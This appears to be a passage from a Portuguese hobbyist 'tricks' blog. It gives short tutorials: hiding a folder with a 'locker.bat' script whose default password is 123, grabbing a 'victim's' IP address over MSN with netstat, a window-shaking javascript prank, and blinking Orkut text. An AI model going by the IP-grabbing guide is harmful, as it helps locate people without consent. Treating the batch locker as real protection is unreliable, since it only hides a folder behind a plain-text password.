ok.. voltando pra pasta onde foi salvo o arquivo bat
abra o arquivo \'locker.bat\' dê ENTER 2 VEZES e irá aparecer uma pasta chamada \'Private\'
essa será a pasta que ficará escondida e só será aberta com a senha que voce escolheu.
depois ter criado a pasta \'Private\', clique novamente sobre o arquivo
\'locker.bat\' e irá aparecer a janelinha do Dos .. a seguinte pergunta será feita:
Tem certeza de que deseja bloquear a pasta (Y / N)
digite Y e dê ENTER 2 VEZES
repare agora q a pasta \'Private\' desapareceu...
ela está agora oculta e só será aberta qndo clicar novamente no arquivo
\'locker.bat\', pois aí será solicitada a senha, com a seguinte frase
Digite a senha para desbloquear a pasta:
Senha padrao : 123
Caso queria mudar a senha
Antes de salvar o texto Digite CTRL + F e procure por 123 e troke pela senha q vc quiser

BOM APRENDIZADO!

-THE MASKARA-
 

PEGUE O IP DA VITIMA POR MSN

By Japiinha Truques'

OLÁ.

HOJE VOU ENSINAR A VOÇÊS A PEGAR O IP DA VITIMA POR MSN.

1º. Esteja com o msn aberto, e escolha a vitima de quem quer se apossar do Ip.


. Clique em Iniciar logo após em Executar, na janela que se abrir, digite as letras ‘’cmd’’ (sem aspas). Aonde abrira uma tela preta, que é conhecida como prompt de comando ou linha de comando.

. Nesta linha de comando, digite ‘’netstat –n’’ (sem aspas), apenas digite isso, não pressione nenhuma tecla agora.

. Envie um arquivo a vitima, pode ser qualquer coisa, apenas para termos digamos, ‘’um maior contato’’ com o Ip da pessoa.

. Na hora em que a pessoa Aceitar o arquivo, pegue e abra a tela preta onde foi digitado netstat –n e aperte a tecla enter.

. Aparecerá vários números, mais o que te interessa sempre vai ser o primeiro da lista, os outros, Descarte.

BOM APRENDIZADO!

-THE MASKARA-

 

FASSA A JANELA DA INTERNET TREMER

By Japiinha Truques'
OLÁ.
HOJE VOU ENSINAR A VOCÊS A FAZER A JANELA DA INTERNET "TREMER"
COPIE O CODIGO ABAIXO E COLE NO SEU NAVEGADOR.

javascript:function flood(n) {if (self.moveBy) {for (i = 20; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(10);{ var inp = "!!!PU ad oãtne ?uotsoG"; var outp = ""; for (i = 0; i <= inp.length; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();

BOM APRENDIZADO !

-THE MASKARA -
 

ESCREVA NO ORKUT COM A LETRA PISCANDO

By Japiinha Truques'
OLÁ.
HOJE VOU ENSINAR A VOCÊS A COMO ESCREVER NO ORKUT COM A LETRA PISCANDO,COPIE O CODIGO ABAIXO E COLE NA PAGINA DE RECADOS, TIRE OS ASTERISTICOS ( * ) E ESCREVA UMA MENSAGEM NO LUGAR DE - SEU TEXTO AQUI-

<*div style="text-decoration:blink"*> seu texto aqui <*/div>

BOM APRENDIZADO!

-THE MASKARA-
 

O QUE VOCÊ QUER APRENDER ???

By Japiinha Truques'
FAÇA UM COMENTARIO E DESCREVA O QUE VOCÊ DESEJA APRENDER. FAREI O POSSÍVEL PARA AJUDAR VOCÊS !

BOM APRENDIZADO!

-THE MASKARA-